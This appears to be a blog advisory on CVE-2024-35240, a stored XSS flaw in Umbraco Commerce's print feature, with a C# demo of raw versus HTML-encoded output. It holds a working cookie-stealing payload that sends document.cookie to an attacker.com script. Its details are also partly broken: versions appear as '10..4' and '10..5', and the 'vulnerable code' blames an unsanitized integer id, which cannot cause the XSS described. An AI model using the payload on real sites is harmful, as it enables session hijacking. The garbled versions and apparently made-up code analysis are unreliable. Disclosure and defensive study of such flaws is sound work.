Umbraco Commerce is a popular open source .NET e-commerce solution that is widely used by developers around the world. However, being an open source application also means that it is prone to security vulnerabilities. In this post, we will discuss a critical security vulnerability in Umbraco Commerce, identified as CVE-2024-35240, which is a stored Cross-site Scripting (XSS) issue in its Print Functionality feature.

CVE-2024-35240: Stored XSS Vulnerability

A stored Cross-site Scripting (XSS) vulnerability exists in Umbraco Commerce's Print Functionality feature. The vulnerability allows an attacker to craft a specially designed script that can be injected into the print functionality of the application. By exploiting this vulnerability, an attacker can execute malicious code within the context of the user's browser, potentially enabling a range of malicious actions, such as stealing session cookies, displaying fake content, or redirecting to malicious websites.

The vulnerable code snippet is as follows:

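// Controller action behind the print page; orderId is bound from the HTTP request.
public ActionResult Print(int orderId)
{
    // Load the stored order for the requested id.
    var order = _orderService.GetOrderById(orderId);
    // The order is handed to the view unchanged.
    ViewBag.Order = order;

    return View();
}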

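In the above code snippet, the orderId parameter is taken from the HTTP request and passed to the GetOrderById() function without being sanitized. The retrieved order is then handed to the view through ViewBag unchanged, so whether its stored fields are encoded on output is left entirely to the view. This lack of input validation makes it possible for an attacker to inject malicious code into the print functionality.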

Impact and Exploit Details

An attacker could exploit this vulnerability by crafting a malicious script that is then injected into the print functionality of the affected Umbraco Commerce application. This malicious script would then be executed within the context of the user's browser, potentially enabling a range of malicious actions, such as stealing session cookies, displaying fake content, or redirecting to malicious websites.

For instance, the following JavaScript payload could be used to exploit the vulnerability:

<script>document.location='http://attacker.com/cookie-stealer.php?cookie='+document.cookie</script>;
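How the payload above behaves when a print page writes stored order text raw versus HTML-encoded, as an added example that is not from the original post and is not Umbraco Commerce's code or its fix. The PrintableOrder type, its field names and the PrintPage helper are hypothetical, and the order is constructed sample data.

```csharp
using System;
using System.Collections.Generic;
using System.Net;

// Hypothetical order shape for illustration; not Umbraco Commerce's own model.
public record PrintableOrder(int Id, string CustomerName, string Note);

public static class PrintPage
{
    // Unsafe pattern: stored text is concatenated into markup verbatim.
    public static string RenderRaw(PrintableOrder o) =>
        $"<h1>Order {o.Id}</h1><p>{o.CustomerName}</p><p>{o.Note}</p>";

    // Hardened pattern: every stored string is HTML-encoded where it is written out.
    public static string RenderEncoded(PrintableOrder o) =>
        $"<h1>Order {o.Id}</h1>" +
        $"<p>{WebUtility.HtmlEncode(o.CustomerName)}</p>" +
        $"<p>{WebUtility.HtmlEncode(o.Note)}</p>";

    // Review aid: names the stored fields that contain angle brackets.
    public static List<string> FieldsWithMarkup(PrintableOrder o)
    {
        var hits = new List<string>();
        var fields = new Dictionary<string, string>
        {
            ["CustomerName"] = o.CustomerName,
            ["Note"] = o.Note,
        };
        foreach (var (name, value) in fields)
            if (value.IndexOfAny(new[] { '<', '>' }) >= 0) hits.Add(name);
        return hits;
    }
}

public static class Program
{
    public static void Main()
    {
        // Constructed sample: the payload quoted in the post, saved in a free-text field.
        var order = new PrintableOrder(1001, "Alice Example",
            "<script>document.location='http://attacker.com/cookie-stealer.php?cookie='+document.cookie</script>");

        Console.WriteLine("raw has <script>:     " + PrintPage.RenderRaw(order).Contains("<script>"));
        Console.WriteLine("encoded has <script>: " + PrintPage.RenderEncoded(order).Contains("<script>"));
        Console.WriteLine("fields with markup:   " + string.Join(", ", PrintPage.FieldsWithMarkup(order)));
        Console.WriteLine(PrintPage.RenderEncoded(order));
    }
}
```

In the encoded output the angle brackets and quotes arrive as character entities, so the browser displays the note as text instead of parsing a script element.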

Affected Versions and Mitigation

Umbraco Commerce versions 12.1.3, 10..4, and earlier are affected by this vulnerability. The issue has been fixed in versions 12.1.4 and 10..5. Users are advised to upgrade their Umbraco Commerce installations to the latest version to mitigate this vulnerability. There are no known workarounds for this issue.

References

1. Umbraco Commerce Official Website: https://umbraco.com/products/umbraco-commerce/
2. CVE-2024-35240 Detail: https://nvd.nist.gov/vuln/detail/CVE-2024-35240

Conclusion

In summary, CVE-2024-35240 is a critical stored Cross-site Scripting (XSS) vulnerability in Umbraco Commerce, which enables attackers to inject malicious code into the Print Functionality feature. This issue has been addressed in versions 12.1.4 and 10..5, and users are advised to upgrade their installations to protect themselves from this vulnerability. There are no known workarounds for this issue.

Timeline

Published on: 05/28/2024 21:16:31 UTC
Last modified on: 05/29/2024 13:02:09 UTC